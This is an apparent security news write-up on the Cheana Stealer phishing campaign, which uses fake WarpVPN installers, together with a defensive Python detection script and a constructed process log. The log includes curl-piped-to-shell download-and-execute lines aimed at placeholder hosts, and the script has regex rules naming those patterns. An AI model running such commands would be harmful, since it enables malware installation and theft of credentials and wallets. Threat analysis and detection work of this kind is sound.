The newly discovered Cheana Stealer malware is the primary payload of a cybercriminal campaign. According to the researchers' reports, the operators use a phishing site posing as WarpVPN to trick users into downloading fake VPN installers for several operating systems.
Researchers uncovered the campaign after spotting the VPN-themed phishing website that distributed the malware. What sets it apart from many similar operations is its cross-platform reach: it serves a tailored payload to each of Windows, Linux, and macOS.
Phishers execute the Cheana Stealer campaign using a site that spoofs a reputable VPN service.
The spoofed site imitates the WarpVPN service and is built to push visitors toward downloading the malicious VPN installer. The attackers prepared a separate payload and installation chain for each targeted OS, which widens the pool of potential victims.
On Windows, the malware is delivered by a PowerShell script that runs the install.bat batch file. The batch file first checks whether Python is present on the victim's machine and, if it is not, installs it together with pip and virtualenv. A VPN installer that has to bootstrap a Python interpreter is a warning sign in itself: a legitimate Windows VPN client ships as a signed installer and has no need to do so.
The script then installs hclockify-win, a malicious Python package that does the actual stealing. It targets cryptocurrency browser extensions and standalone wallets, harvests saved passwords from Firefox and Chromium-based browsers, compresses the stolen data into a ZIP archive, and sends it to the attackers' command-and-control (C2) servers.
On Linux, the victim is instructed to run a curl command that downloads a script called install-linux.sh. The script first obtains a unique ID used to track the victim, then harvests browser data, cryptocurrency wallet details, and SSH keys, and finally uploads the stolen data to an attacker-controlled server. Because SSH private keys are among the targets, any Linux host that ran this script should be treated as having leaked every key it held: the keys must be replaced and the matching public keys removed from every authorized_keys file they appear in.
On macOS, the victim is tricked into running a script called install.sh. The script uses fake prompts to coax the user into entering their credentials, then collects browser login data, the macOS account password, and Keychain contents, all of which are forwarded to the attackers' C2 server. The credential prompt is not incidental: the login password is what unlocks the login Keychain, so capturing it is what makes the Keychain theft possible.
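The three delivery chains above share a handful of observable artifacts: PowerShell launching install.bat, the hclockify-win package name, a curl-to-shell pipeline fetching install-linux.sh, and a locally run install.sh. The following is an added example, not code from the original report or from the researchers, showing how a defender might turn those artifacts into detection rules and run them over process-creation telemetry. The log layout (`<timestamp> <host> <command line>`), the sample lines, host names, the example.invalid URLs, the rule names and severities, and the assumption that hclockify-win is installed by name via pip are all constructed for this example; only the four filenames come from the campaign description.

```python
import re

# Indicator names taken from the campaign description: install.bat, hclockify-win,
# install-linux.sh, install.sh. The log layout ("<timestamp> <host> <command line>"),
# the sample lines, hosts, URLs, rule names and severities are all constructed
# for this example and are not from the original report.
RULES = [
    # Generic download-and-execute pipeline: the Linux delivery method, but also
    # common in legitimate tooling, so only medium severity on its own.
    ("curl-pipe-shell", "medium",
     re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # PowerShell launching the Windows batch installer.
    ("powershell-install-bat", "high",
     re.compile(r"\bpowershell(\.exe)?\b.*\binstall\.bat\b", re.I)),
    # The Python stealer package appearing anywhere on a command line
    # (assumes it is installed by name, e.g. via pip).
    ("hclockify-win", "high",
     re.compile(r"\bhclockify-win\b", re.I)),
    # Fetching the Linux installer script by its distinctive name.
    ("fetch-install-linux-sh", "high",
     re.compile(r"\b(curl|wget)\b.*\binstall-linux\.sh\b")),
    # install.sh is a generic filename, so on its own it is only a hint.
    ("install-sh-run", "low",
     re.compile(r"\binstall\.sh\b")),
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<cmd>.+)$")

# Constructed process-audit excerpt, one process start per line.
SAMPLE_LOG = """\
2024-08-14T10:01:02Z win01 powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\alice\\Downloads\\install.bat
2024-08-14T10:01:40Z win01 pip install hclockify-win
2024-08-14T10:02:11Z lnx02 curl -fsSL https://example.invalid/install-linux.sh | bash
2024-08-14T10:03:05Z mac03 bash ./install.sh
2024-08-14T10:03:30Z mac03 curl -fsSL https://example.invalid/install.sh | sh
2024-08-14T10:04:00Z dev05 sh ./install.sh
2024-08-14T10:04:20Z lnx04 git pull origin main
"""


def scan(log_text):
    """Match every rule against every parsed command line; return one hit per match."""
    hits = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip blank or malformed lines
        for name, severity, pattern in RULES:
            if pattern.search(m["cmd"]):
                hits.append({"ts": m["ts"], "host": m["host"], "rule": name,
                             "severity": severity, "cmd": m["cmd"]})
    return hits


def hosts_to_triage(hits):
    """Hosts worth a look: any high-severity hit, or two or more distinct rules."""
    by_host = {}
    for h in hits:
        by_host.setdefault(h["host"], {})[h["rule"]] = h["severity"]
    return sorted(host for host, rules in by_host.items()
                  if "high" in rules.values() or len(rules) >= 2)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f"[{h['severity']:6}] {h['host']} {h['rule']}: {h['cmd']}")
    print("triage:", hosts_to_triage(found))
```

On the constructed input, win01 and lnx02 are flagged on the campaign-specific indicators alone, mac03 is flagged because the generic install.sh hint co-occurs with a curl-to-shell pipeline, and dev05, which only ran a local install.sh, is left alone. The generic rules (curl-pipe-shell, install-sh-run) will fire on legitimate developer activity, which is why the triage logic requires either a campaign-specific name or two independent signals before raising a host; tune that threshold to your environment. Command-line telemetry of this shape comes from Sysmon event ID 1 or Windows event 4688 on Windows, and from auditd or an EDR agent on Linux and macOS.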
The malware runs on all three platforms, but none of the described stages exploits a software vulnerability: each one depends on the victim downloading and running the installer and, on macOS, typing a password into a fake prompt. Users should therefore obtain VPN clients only from the vendor's official site or app store, and treat a VPN download that wants to install Python, asks to be piped from curl into a shell, or requests the account password through an unexpected prompt as a sign of this kind of phishing campaign.